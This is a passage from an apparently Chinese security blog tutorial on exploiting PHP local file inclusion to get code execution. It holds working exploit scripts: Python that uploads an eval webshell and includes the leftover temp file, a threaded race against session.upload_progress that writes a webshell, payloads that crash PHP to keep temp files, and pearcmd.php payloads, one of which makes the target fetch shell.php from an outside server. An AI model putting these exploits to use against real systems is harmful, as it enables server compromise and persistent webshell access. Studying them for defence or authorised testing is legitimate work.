&#x27;http://192.168.68.119/dir.php?dir=/tmp/&#x27;</span><br><span class="line">r = requests.get(url2)</span><br><span class="line">data = re.search(r&quot;php[a-zA-Z0-9]&#123;1,&#125;&quot;, r.content).group(0)</span><br><span class="line"></span><br><span class="line">print &quot;++++++++++++++++++++++&quot;</span><br><span class="line">print data</span><br><span class="line">print &quot;++++++++++++++++++++++&quot;</span><br><span class="line"></span><br><span class="line">url3=&#x27;http://192.168.68.119/index.php?file=/tmp/&#x27;+data</span><br><span class="line">data = &#123;</span><br><span class="line">&#x27;Qftm&#x27;:&quot;system(&#x27;whoami&#x27;);&quot;</span><br><span class="line">&#125;</span><br><span class="line">r =  requests.post(url=url3,data=data)</span><br><span class="line">print r.content</span><br></pre></td></tr></table></figure>

<p><strong>编写 Windows Exp</strong></p>
<p>windows网络攻击环境下的脚本编写</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#python version 2.7</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> io <span class="keyword">import</span> BytesIO</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">files = &#123;</span><br><span class="line">  <span class="string">&#x27;file&#x27;</span>: BytesIO(<span class="string">&#x27;&lt;?php eval($_REQUEST[Qftm]);&#x27;</span>)</span><br><span class="line">&#125;</span><br><span class="line">url1 = <span class="string">&#x27;http://192.168.68.119/web/fi/index.php?file=php://filter/string.strip_tags/resource=index.php&#x27;</span></span><br><span class="line">r = requests.post(url=url1, files=files, allow_redirects=<span class="literal">False</span>)</span><br><span class="line"></span><br><span class="line">url2 = <span class="string">&#x27;http://192.168.68.119/web/fi/dir.php?dir=C:/Windows/&#x27;</span></span><br><span class="line">r = requests.get(url2)</span><br><span class="line">data = re.search(<span class="string">r&quot;php[a-zA-Z0-9]&#123;1,&#125;&quot;</span>, r.content).group(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;++++++++++++++++++++++&quot;</span></span><br><span class="line"><span class="built_in">print</span> data</span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;++++++++++++++++++++++&quot;</span></span><br><span class="line"></span><br><span class="line">url3=<span class="string">&#x27;http://192.168.68.119/web/fi/index.php?file=C:/Windows/&#x27;</span>+data+<span class="string">&#x27;.tmp&#x27;</span></span><br><span class="line">data = &#123;</span><br><span class="line"><span class="string">&#x27;Qftm&#x27;</span>:<span class="string">&quot;system(&#x27;whoami&#x27;);&quot;</span></span><br><span class="line">&#125;</span><br><span class="line">r =  requests.post(url=url3,data=data)</span><br><span class="line"><span class="built_in">print</span> r.content</span><br></pre></td></tr></table></figure>

<p><strong>系统EXP利用</strong></p>
<p>针对不同的系统环境运行脚本就可以RCE拿到任意代码执行</p>
<p>然后查看服务器上恶意临时文件，确实存在未被删除！！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.68.119/web/fi/dir.php?file=C:/Windows/</span><br></pre></td></tr></table></figure>

<p><strong>Getshell</strong></p>
<p>由于我们上传的恶意临时文件没有被删除，那么就可以使用Webshell管理工具蚁剑对<code>php2EFF.tmp</code>进行包含利用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://  /web/fi/index.php?file=C:/Windows/php2EFF.tmp</span><br><span class="line">Qftm</span><br></pre></td></tr></table></figure>

<p><strong>思路</strong></p>
<ul>
<li>index.php?file=php://filter/string.strip_tags/resource=index.php</li>
<li>上传脚本，查看形成的临时文件名</li>
<li>蚁剑连接</li>
</ul>
<h3 id="攻击利用-技巧2"><a href="#攻击利用-技巧2" class="headerlink" title="攻击利用-技巧2"></a><strong>攻击利用-技巧2</strong></h3><p><strong>暴力破解</strong></p>
<p><strong>攻击载荷</strong></p>
<p>编写临时文件生成和暴力破解攻击载荷</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#python version 2.7</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> io <span class="keyword">import</span> BytesIO</span><br><span class="line"></span><br><span class="line">files = &#123;</span><br><span class="line">  <span class="string">&#x27;file&#x27;</span>: BytesIO(<span class="string">&#x27;&lt;?php eval($_REQUEST[Qftm]);&#x27;</span>)</span><br><span class="line">&#125;</span><br><span class="line">url1 = <span class="string">&#x27;http://192.168.68.119/web/fi/index.php?file=php://filter/string.strip_tags/resource=index.php&#x27;</span></span><br><span class="line">r = requests.post(url=url1, files=files, allow_redirects=<span class="literal">False</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">暴力破解模<span class="comment">########################</span></span><br><span class="line">url2=<span class="string">&#x27;http://192.168.68.119/web/fi/index.php?file=C:/Windows/php&#x27;</span>+&#123;fuzz&#125;+<span class="string">&#x27;.tmp&amp;Qftm=system(&#x27;</span>whoami<span class="string">&#x27;);&#x27;</span></span><br><span class="line">data = fuzz</span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;++++++++++++++++++++++&quot;</span></span><br><span class="line"><span class="built_in">print</span> data</span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;++++++++++++++++++++++&quot;</span></span><br><span class="line"><span class="comment">########################暴力破解模########################</span></span><br></pre></td></tr></table></figure>

<p>或者进行fuzz</p>
<p>推荐几款好用的Fuzz工具</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">基于Go开发：gobuster     https://github.com/OJ/gobuster</span><br><span class="line">基于Java开发：dirbuster  OWASP杰出工具 kali自带</span><br><span class="line">基于Python开发：wfuzz    https://github.com/xmendez/wfuzz</span><br></pre></td></tr></table></figure>

<p><strong>Getshell</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:// /web/fi/index.php?file=C:/Windows/php2EFF.tmp</span><br></pre></td></tr></table></figure>

<p><strong>补充</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">上面的哪种情况(phpinfo-&gt;临时文件-&gt;LFI)只有网站存在phpinfo(有些网站难免会留下这样的信息或者是一些网站本身之前测试的地方所留下的)然后结合文件包含就可以利用成功；要是网站存在文件上传漏洞且可以解析上传的脚本那么就不需要文件包含来利用</span><br></pre></td></tr></table></figure>

<h3 id="攻击利用-技巧3"><a href="#攻击利用-技巧3" class="headerlink" title="攻击利用-技巧3"></a><strong>攻击利用-技巧3</strong></h3><p>利用Windows 通配符</p>
<p>0x02中的利用方法需要两个条件：</p>
<ol>
<li>存在phpinfo等可以泄露临时文件名的页面</li>
<li>网络条件好，才能让Race Condition成功</li>
</ol>
<p>PHP在读取Windows文件时，会使用到<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-findfirstfileexw">FindFirstFileExW</a>这个Win32 API来查找文件，而这个API是支持使用通配符的：</p>
<p>PHP中星号和问号并不能直接作为通配符使用。</p>
<ul>
<li>DOS_STAR：即 <code>&lt;</code>，匹配0个以上的字符</li>
<li>DOS_QM：即<code>&gt;</code>，匹配1个字符</li>
<li>DOS_DOT：即<code>&quot;</code>，匹配点号</li>
</ul>
<p>这样，我们在Windows下，可以使用上述通配符来替代临时文件名中的随机字符串：<code>C:\Windows\Temp\php&lt;&lt;</code>。（由于Windows内部的一些不太明确的原因，这里一般需要用两个<code>&lt;</code>来匹配多个字符）</p>
<p>我们直接向含有文件包含漏洞的页面发送一个上传包：</p>
<p>在content-Disposition  C:\Windows\Temp\php&lt;&lt;</p>
<p>上传一个txt文件，包含一句话木马</p>
<h2 id="0x08-session-upload-progress与Session文件包含"><a href="#0x08-session-upload-progress与Session文件包含" class="headerlink" title="0x08  session.upload_progress与Session文件包含"></a>0x08  session.upload_progress与Session文件包含</h2><p>上述的两个方法，其实都没有解决本篇文章遇到的问题，毕竟Docker环境即不存在phpinfo也不存在Windows特性。</p>
<p>第三个方法也已经广为流传，PHP中可以通过session progress功能实现临时文件的写入。这种利用方式需要满足下面几个条件：</p>
<ul>
<li>目标环境开启了<code>session.upload_progress.enable</code>选项</li>
<li>发送一个文件上传请求，其中包含一个文件表单和一个名字是<code>PHP_SESSION_UPLOAD_PROGRESS</code>的字段</li>
<li>请求的Cookie中包含Session ID</li>
</ul>
<p>这个方法的原理是，PHP在开启了<code>session.upload_progress.enable</code>后（在包括Docker的大部分环境下默认是开启的），将会把用户上传文件的信息保存在Session中，而PHP的Session默认是保存在文件里的。</p>
<p>所以当攻击者发送满足上述条件的数据包时，就等于能够控制Session文件内容。</p>
<p>我们可以尝试发送满足上述条件的数据包来测试一下，但会发现虽然我们可以让PHP开启Session，从而在/tmp目录下遗留下Session文件，但这个文件内容是空的。</p>
<p>原因是，PHP中还有另外一个配置项<code>session.upload_progress.cleanup</code>，默认开启。在这个选项开启时，PHP会在上传请求被读取完成后自动清理掉这个Session，如果我们尝试把这个选项关闭，就可以读取到Session文件的内容了：</p>
<p><strong>注意的是，如果我们只上传一个文件，这里也是不会遗留下Session文件的，所以表单里必须有两个以上的文件上传。</strong></p>
<p>所以，默认情况下，我们需要在Session文件被清理前利用它，这也会用到条件竞争（Race Condition）。</p>
<p>因为这里的Session文件名是可控的，所以相比于0x02的条件竞争，这个会简单很多。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> concurrent.futures <span class="keyword">import</span> ThreadPoolExecutor, wait</span><br><span class="line"></span><br><span class="line">target = <span class="string">&#x27;http://192.168.1.162:8080/index.php&#x27;</span></span><br><span class="line">session = requests.session()</span><br><span class="line">flag = <span class="string">&#x27;helloworld&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upload</span>(<span class="params">e: threading.Event</span>):</span></span><br><span class="line">    files = [</span><br><span class="line">        (<span class="string">&#x27;file&#x27;</span>, (<span class="string">&#x27;load.png&#x27;</span>, <span class="string">b&#x27;a&#x27;</span> * <span class="number">40960</span>, <span class="string">&#x27;image/png&#x27;</span>)),</span><br><span class="line">    ]</span><br><span class="line">    data = &#123;<span class="string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>: <span class="string">rf&#x27;&#x27;&#x27;&lt;?php file_put_contents(&#x27;/tmp/success&#x27;, &#x27;&lt;?=phpinfo()?&gt;&#x27;); echo(&#x27;<span class="subst">&#123;flag&#125;</span>&#x27;); ?&gt;&#x27;&#x27;&#x27;</span>&#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">not</span> e.is_set():</span><br><span class="line">        requests.post(</span><br><span class="line">            target,</span><br><span class="line">            data=data,</span><br><span class="line">            files=files,</span><br><span class="line">            cookies=&#123;<span class="string">&#x27;PHPSESSID&#x27;</span>: flag&#125;,</span><br><span class="line">        )</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">e: threading.Event</span>):</span></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">not</span> e.is_set():</span><br><span class="line">        response = requests.get(</span><br><span class="line">            <span class="string">f&#x27;<span class="subst">&#123;target&#125;</span>?file=/tmp/sess_<span class="subst">&#123;flag&#125;</span>&#x27;</span>,</span><br><span class="line">        )</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> flag.encode() <span class="keyword">in</span> response.content:</span><br><span class="line">            e.<span class="built_in">set</span>()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    futures = []</span><br><span class="line">    event = threading.Event()</span><br><span class="line">    pool = ThreadPoolExecutor(<span class="number">15</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">        futures.append(pool.submit(upload, event))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line">        futures.append(pool.submit(write, event))</span><br><span class="line"></span><br><span class="line">    wait(futures)</span><br></pre></td></tr></table></figure>

<p>脚本执行完毕后会在目标中写入<code>/tmp/success</code>文件，里面即为Webshell：</p>
<h2 id="0x09-Segfault遗留下TEMP文件"><a href="#0x09-Segfault遗留下TEMP文件" class="headerlink" title="0x09 Segfault遗留下TEMP文件"></a>0x09 Segfault遗留下TEMP文件</h2><p>关闭了<code>session.upload_progress.enable</code></p>
<p>我们的目的是在服务器上留下一个内容可控的文件，最简单的方法就是利用上传包的临时文件。但这个临时文件之所以不能直接利用，原因有两点：</p>
<ul>
<li>临时文件名是随机的</li>
<li>临时文件在请求结束后会被删除</li>
</ul>
<p>第一点我们可以通过爆破来解决,第二点<strong>可以让PHP进程在请求结束前出现异常退出执行，那么临时文件就可以免于被删除了</strong>。</p>
<p>PHP底层是C语言开发的，不少内存错误都会导致进程异常退出，当然不论是Apache还是PHP-FPM都会存在master进程，在某一个子进程异常退出后会拉起新的进程来处理用户请求，不用担心搞挂服务器。</p>
<p><strong>方法一</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">include &#x27;php://filter/string.strip_tags/resource=/etc/passwd&#x27;;</span><br></pre></td></tr></table></figure>

<p>使用7.1.19版本</p>
<p>可以在一个数据包里多放一些文件表单（默认最多可以有20个），然后多发送几次数据包，这样就可以在遗留下很多临时文件，极大地增加了爆破成功率，减少了爆破所需要的时间。</p>
<p><strong>方法二</strong></p>
<p><code>php://filter</code>中另一个可以导致crash的方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">file(urldecode(&#x27;php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAFAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA&#x27;));</span><br></pre></td></tr></table></figure>

<p>不过在文件包含场景下，这个POC涉及到<code>data:</code>协议，会因为<code>allow_url_include=Off</code>而失败。</p>
<p><strong>方法三</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://bugs.php.net/bug.php?id=78875、https://bugs.php.net/bug.php?id=78876</span><br></pre></td></tr></table></figure>





<h2 id="0x010-包含pearcmd-php"><a href="#0x010-包含pearcmd-php" class="headerlink" title="0x010   包含pearcmd.php"></a>0x010   包含pearcmd.php</h2><p>要利用这个pearcmd.php需要满足几个条件</p>
<ul>
<li>安装了pear（这样才能有pearcmd.php）</li>
<li>开启了<code>register_argc_argv</code>(如果环境中没有php.ini，则默认register_argc_argv=On)</li>
<li>存在文件包含且可以包含后缀为php的文件且没有<code>open_basedir</code>的限制。</li>
</ul>
<p><strong>靶机可出网</strong></p>
<p>靶机test.php如下，需要拉取远程服务器的shell.php到靶机的/tmp目录下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/test.php?file=/usr/share/php/pearcmd.php&amp;+install+-R+/tmp+http://vps/shell.php</span><br></pre></td></tr></table></figure>

<p>然后文件包含/tmp/tmp/pear/download/shell.php同时传参<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=cmd&spm=1001.2101.3001.7020">cmd</a>即可</p>
<p><strong>靶机不可出网时</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/test.php?+config-create+/&amp;file=/usr/share/php/pearcmd.php&amp;/&lt;?=phpinfo()?&gt;+/tmp/hello.php</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/test.php?+config-create+/&amp;file=/usr/share/php/pearcmd.php&amp;/&lt;?=eval($_POST[])?&gt;+/tmp/hello.php</span><br></pre></td></tr></table></figure>

<p><strong>getshell</strong></p>
<p>?file=/tmp/hello.php</p>
<p>post 利用一句话木马</p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/139229792">PHP文件包含漏洞利用思路与Bypass总结手册（完结） - 知乎 (zhihu.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html">Docker PHP裸文件本地包含综述 | 离别歌 (leavesongs.com)</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='true'
        data-ae='true'
        data-ci=''
        data-cs=''
        data-r=''
        data-o=''
        data-a=''
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
			<ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0%C3%9701-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">0×01 文件包含简介</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%87%BD%E6%95%B0"><span class="toc-number">1.1.</span> <span class="toc-text">文件包含函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BA%A7%E7%94%9F%E5%8E%9F%E5%9B%A0"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞产生原因</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0%C3%9702-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.</span> <span class="toc-text">0×02 本地文件包含漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E9%99%90%E5%88%B6%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.1.</span> <span class="toc-text">无限制本地文件包含漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#session%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.2.</span> <span class="toc-text">session文件包含漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%89%E9%99%90%E5%88%B6%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E7%BB%95%E8%BF%87"><span class="toc-number">2.3.</span> <span class="toc-text">有限制本地文件包含漏洞绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0%C3%9703-%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.</span> <span class="toc-text">0×03 远程文件包含漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E9%99%90%E5%88%B6%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.1.</span> <span class="toc-text">无限制远程文件包含漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%89%E9%99%90%E5%88%B6%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E7%BB%95%E8%BF%87"><span class="toc-number">3.2.</span> <span class="toc-text">有限制远程文件包含漏洞绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0%C3%9704-PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.</span> <span class="toc-text">0×04 PHP伪协议</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#php-%E8%BE%93%E5%85%A5%E8%BE%93%E5%87%BA%E6%B5%81"><span class="toc-number">4.1.</span> <span class="toc-text">php:&#x2F;&#x2F; 输入输出流</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php-filter%EF%BC%88%E6%9C%AC%E5%9C%B0%E7%A3%81%E7%9B%98%E6%96%87%E4%BB%B6%E8%BF%9B%E8%A1%8C%E8%AF%BB%E5%8F%96%EF%BC%89"><span class="toc-number">4.2.</span> <span class="toc-text">php:&#x2F;&#x2F;filter（本地磁盘文件进行读取）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php-input"><span class="toc-number">4.3.</span> <span class="toc-text">php:&#x2F;&#x2F;input</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#file-%E4%BC%AA%E5%8D%8F%E8%AE%AE-%EF%BC%88%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%EF%BC%89"><span class="toc-number">4.4.</span> <span class="toc-text">file:&#x2F;&#x2F;伪协议 （读取文件内容）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#data-%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.5.</span> <span class="toc-text">data:&#x2F;&#x2F;伪协议</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#phar-%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.6.</span> <span class="toc-text">phar:&#x2F;&#x2F;伪协议</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#zip-%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.7.</span> <span class="toc-text">zip:&#x2F;&#x2F;伪协议</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05%E5%8C%85%E5%90%AB%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6"><span class="toc-number">5.</span> <span class="toc-text">0x05包含日志文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-%E5%8C%85%E5%90%AB-pros-self-environ"><span class="toc-number">6.</span> <span class="toc-text">0x06 包含&#x2F;pros&#x2F;self&#x2F;environ</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x07-%E5%8C%85%E5%90%AB%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6"><span class="toc-number">7.</span> <span class="toc-text">0x07 包含临时文件</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%88%A9%E7%94%A8-%E6%8A%80%E5%B7%A71"><span class="toc-number">7.1.</span> <span class="toc-text">攻击利用-技巧1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%88%A9%E7%94%A8-%E6%8A%80%E5%B7%A72"><span class="toc-number">7.2.</span> <span class="toc-text">攻击利用-技巧2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%88%A9%E7%94%A8-%E6%8A%80%E5%B7%A73"><span class="toc-number">7.3.</span> <span class="toc-text">攻击利用-技巧3</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x08-session-upload-progress%E4%B8%8ESession%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">8.</span> <span class="toc-text">0x08  session.upload_progress与Session文件包含</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x09-Segfault%E9%81%97%E7%95%99%E4%B8%8BTEMP%E6%96%87%E4%BB%B6"><span class="toc-number">9.</span> <span class="toc-text">0x09 Segfault遗留下TEMP文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x010-%E5%8C%85%E5%90%ABpearcmd-php"><span class="toc-number">10.</span> <span class="toc-text">0x010   包含pearcmd.php</span></a></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
